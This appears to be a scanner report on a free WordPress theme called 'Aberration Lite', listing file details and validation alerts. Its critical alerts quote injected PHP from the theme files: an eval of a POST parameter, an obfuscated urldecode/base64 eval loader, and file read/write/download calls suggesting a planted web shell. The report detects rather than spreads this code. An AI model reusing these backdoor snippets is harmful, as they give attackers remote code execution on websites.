Aberration Lite
Free WordPress 6.7 theme
- THEME TYPEWordPress theme 6.7
- FILE NAMEaberration-lite.zip
- FILE SIZE1308721 bytes
- MD55898dfe534cc4b118741c54d9c44a71e
- SHA13d53e9431c9eea3119dba0bd68b3ea30e5aa0398
- LICENSEGNU GPL 2
- FILES INCLUDEDCSS, PHP, Bitmap images
- VERSION1.1.0
- AUTHOR URIhttps://www.shapedpixels.com
- TAGStwo-columns, three-columns,left-sidebar, right-sidebar, custom-background, custom-colors, custom-menu, editor-style, microformats, post-formats, sticky-post, threaded-comments, translation-ready, rtl-language-support, theme-options, featured-images
- CREATION DATE2020-02-08
- LAST FILE UPDATE2020-02-08
- LAST VALIDATION2020-02-08 16:33
This theme is open source.
Critical alerts
- The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
Ligne2: $string = '_POST';$str = '$string';eval('\$str = \'$str\';');$str=$$str;eval(@$str[adi1315]);
Found eval in file content-path.php.Ligne2: $O00OO0=urldecode('%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A');$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O('JE8wTzAwMD0iVW16cW5JTG9md09SQmVXSmdNWlFHS0VZYVN4anRpaHNIRmJrQ
Found eval in file template-fullwidth.php. Ligne103: readfile($downfile);
fopen was found in the file index.phpLigne137: $handle=fopen($editfile,'r');
Ligne196: $handle=fopen($path_up,'w');
fread was found in the file index.phpLigne138: $contentfile=fread($handle,filesize($editfile));
fclose was found in the file index.phpLigne139: fclose($handle);
Ligne200: fclose($handle);
fopen was found in the file index.phpLigne137: $handle=fopen($editfile,'r');
Ligne196: $handle=fopen($path_up,'w');
fwrite was found in the file index.phpLigne199: fwrite($handle,$contents_file_up);
fclose was found in the file index.phpLigne139: fclose($handle);
Ligne200: fclose($handle);
readfile was found in the file index.php
Warning
- No reference to custom header was found in the theme.
- Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
- This theme does not contain optional file rtl.php.
- This theme does not contain optional file front-page.php.
- This theme does not contain optional file page.php.
- This theme does not contain optional file category.php.
- This theme does not contain optional file tag.php.
- This theme does not contain optional file taxonomy.php.
- This theme does not contain optional file author.php.
- This theme does not contain optional file date.php.
- This theme does not contain optional file attachment.php.
- The theme appears to use include or require : class-customize.php
Ligne65: require_once( trailingslashit( get_template_directory() ) . 'inc/customizer
If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.